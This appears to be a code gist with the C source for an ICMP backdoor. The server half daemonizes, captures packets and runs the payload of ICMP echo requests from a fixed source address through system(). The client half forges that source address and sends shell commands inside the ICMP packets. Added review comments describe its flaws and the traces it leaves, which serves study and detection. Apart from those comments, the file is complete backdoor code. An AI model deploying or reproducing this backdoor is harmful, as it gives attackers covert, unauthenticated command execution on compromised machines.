
@melito
Created June 17, 2009 17:56
/* chrak's icmp backdoor server */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <strings.h>
#include <unistd.h>
#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/if_ether.h>
/*
 * Server half of the ICMP command channel: captures IPv4 frames on a packet
 * socket, detaches from the terminal, and passes the payload of every frame
 * that matches the source-address/ICMP-type test below to system().
 *
 * Review notes (defender's view of what this listing does and where it is weak):
 *  - The only gate on command execution is a hard-coded source address and the
 *    ICMP type. There is no authentication, and the IP protocol field and the
 *    ICMP checksum are never checked.
 *  - recv() is allowed to write far more than the buffer holds (heap overflow).
 *  - Host-side indicators visible in this code: a detached, long-lived process
 *    holding a packet-capture socket, and shell children spawned by it.
 *    Network-side: ICMP echo requests whose payload is command-line text.
 */
int main(void)
{
/* Single heap buffer of sizeof(iphdr) + sizeof(icmphdr) + 55 bytes, reused for every frame. */
char *packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 55);
struct icmphdr *icmp_header;
struct iphdr *ip_header;
char *data;
int s;
if ((void *) packet == NULL)
{
printf("Not enough memory\n");
exit(-1);
}
/*
 * All three views skip the first 14 bytes of the buffer -- presumably the
 * Ethernet header delivered by the packet socket (TODO confirm). The ICMP
 * offset uses sizeof(struct iphdr), so a frame carrying IP options is
 * misparsed. Because data starts 14 bytes further in than the allocation
 * accounts for, only 55 - 14 = 41 bytes of payload fit inside the buffer.
 */
ip_header = (struct iphdr *) (packet + 14);
icmp_header = (struct icmphdr *) (packet + sizeof(struct iphdr) + 14);
data = (packet + sizeof(struct iphdr) + sizeof(struct icmphdr) + 14);
/*
 * SOCK_PACKET is the obsolete Linux link-layer capture socket type. Opening
 * it normally requires root or CAP_NET_RAW, so an unexpected process holding
 * such a socket is worth flagging during host triage.
 */
if ((s = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP))) == -1)
{
perror("socket");
exit(-1);
}
/*
 * fork / setsid / fork: the parent exits each time, so the surviving process
 * is in a new session with no controlling terminal and is not a session leader.
 */
if (fork())
exit(0);
if (setsid() < 0)
exit(0);
if (fork())
exit(0);
for (;;)
{
/*
 * NOTE(review): asks for up to 1000 bytes into the much smaller allocation
 * above, so any larger frame overflows the heap buffer. The return value is
 * ignored; a short or failed read leaves the previous frame's bytes in place
 * and they are evaluated again.
 */
recv(s, packet, 1000, 0);
/*
 * Match test: source address equals 6.6.6.6 and the byte at the ICMP type
 * offset equals ICMP_ECHO. ip_header->protocol is not checked, so the "type"
 * byte is read from whatever follows the IP header.
 */
if ((ip_header->saddr == inet_addr("6.6.6.6")) && (icmp_header->type == ICMP_ECHO))
/*
 * NOTE(review): the payload goes to the shell unvalidated and is not
 * guaranteed to be NUL-terminated by this code; it runs with the privileges
 * of this process.
 */
system(data);
}
}
/* chrak's icmp backdoor client */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <strings.h>
#include <unistd.h>
#include <linux/ip.h>
#include <linux/icmp.h>
/* Forward declaration; the definition follows main() in this listing. */
unsigned short in_cksum(unsigned short *, int);
/*
 * Client half of the ICMP command channel (a separate program from the server
 * listing earlier on this page). Builds one IPv4/ICMP echo request by hand,
 * with the command line from argv[2..] as the ICMP payload, and sends it to
 * argv[1] over a raw socket.
 *
 * Review notes:
 *  - The source address is forged to the constant the server matches on, so
 *    networks that enforce source-address validation on egress would drop
 *    this packet before it leaves.
 *  - The packet buffer is never zeroed and the payload copy is unbounded; see
 *    the inline notes.
 *
 * Returns/exits: exit(-1) on usage or socket errors, -1 if sendto() fails,
 * exit(0) after one packet has been sent.
 */
int main(int argc, char *argv[])
{
/* NOTE(review): malloc() result is not checked and the memory is uninitialized. */
char *packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 55);
struct sockaddr_in sockinfo;
struct icmphdr *icmp_header;
struct iphdr *ip_header;
char *cmdline;
/* i doubles as the IP_HDRINCL option value (1) and, later, the argv loop index. */
int i = 1, s;
if (argc < 3)
{
printf("usage: %s <ip> <command line>\n", argv[0]);
exit(-1);
}
/* Layout: IP header at offset 0, ICMP header after it, command text after both (55 bytes of room). */
ip_header = (struct iphdr *) (packet);
icmp_header = (struct icmphdr *) (packet + sizeof(struct iphdr));
cmdline = (packet + sizeof(struct iphdr) + sizeof(struct icmphdr));
/* Raw socket: normally requires root or CAP_NET_RAW. */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
{
perror("socket");
exit(-1);
}
/* IP_HDRINCL: the caller supplies the IP header, which is what allows saddr to be set below. */
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &i, sizeof(int)) == -1)
{
perror("setsockopt");
exit(-1);
}
/*
 * Header fields set by hand. frag_off, check, and the ICMP code/id/sequence
 * fields are never assigned here, so they carry whatever bytes malloc()
 * returned unless the kernel overwrites them.
 */
ip_header->saddr = inet_addr("6.6.6.6");
ip_header->daddr = inet_addr(argv[1]);
ip_header->ttl = 60;
ip_header->id = htons(getpid());
ip_header->version = 4;
ip_header->ihl = 5;
ip_header->tos = 0;
ip_header->protocol = IPPROTO_ICMP;
icmp_header->type = ICMP_ECHO;
/*
 * NOTE(review): strlen(cmdline) reads uninitialized heap memory on the first
 * pass (undefined behaviour), and sprintf() is unbounded, so arguments longer
 * than the 55 bytes reserved for the payload overflow the buffer.
 */
for (i = 2; i < argc; i++)
sprintf(cmdline + strlen(cmdline), "%s ", argv[i]);
/*
 * NOTE(review): the checksum field is not zeroed before it is summed, so the
 * result includes whatever that field held beforehand.
 */
icmp_header->checksum = in_cksum((unsigned short *) icmp_header,
sizeof(struct icmphdr) + strlen(cmdline));
/* Stored in host byte order; on Linux raw sockets the kernel is documented to fill in tot_len itself (TODO confirm for the target kernel). */
ip_header->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr) + strlen(cmdline) + 1;
/* NOTE(review): sockinfo is not zeroed, so sin_port and padding are indeterminate. */
sockinfo.sin_family = AF_INET;
sockinfo.sin_addr.s_addr = ip_header->daddr;
if (sendto(s, packet, ip_header->tot_len,
0, (struct sockaddr *) &sockinfo, sizeof(struct sockaddr)) == -1)
{
perror("sendto");
return -1;
}
exit(0);
}
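/*
 * in_cksum - 16-bit one's-complement checksum over a byte range.
 *
 * addr: start of the data, read as native-order 16-bit words.
 * len:  number of bytes to sum; values <= 0 sum nothing.
 *
 * Returns the bitwise complement of the folded 16-bit sum (0xffff for an
 * empty range). A trailing odd byte is placed in the first byte of a zeroed
 * 16-bit word before it is added, matching the original behaviour.
 *
 * The accumulator is unsigned and is folded whenever its top bit is set, so
 * long inputs no longer hit signed-integer overflow or lose carries. Assumes
 * unsigned int is at least 32 bits wide.
 */
unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned int sum = 0;
    const unsigned short *w = addr;
    int nleft = len;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
        /* Fold early so the next addition cannot wrap the accumulator. */
        if (sum & 0x80000000u)
            sum = (sum & 0xffffu) + (sum >> 16);
    }

    if (nleft == 1) {
        unsigned short last = 0;

        /* Character-typed access: copy the odd byte into the word's first byte. */
        *(unsigned char *)&last = *(const unsigned char *)w;
        sum += last;
    }

    /* Add the carries back in until the sum fits in 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffffu) + (sum >> 16);

    return (unsigned short)~sum;
}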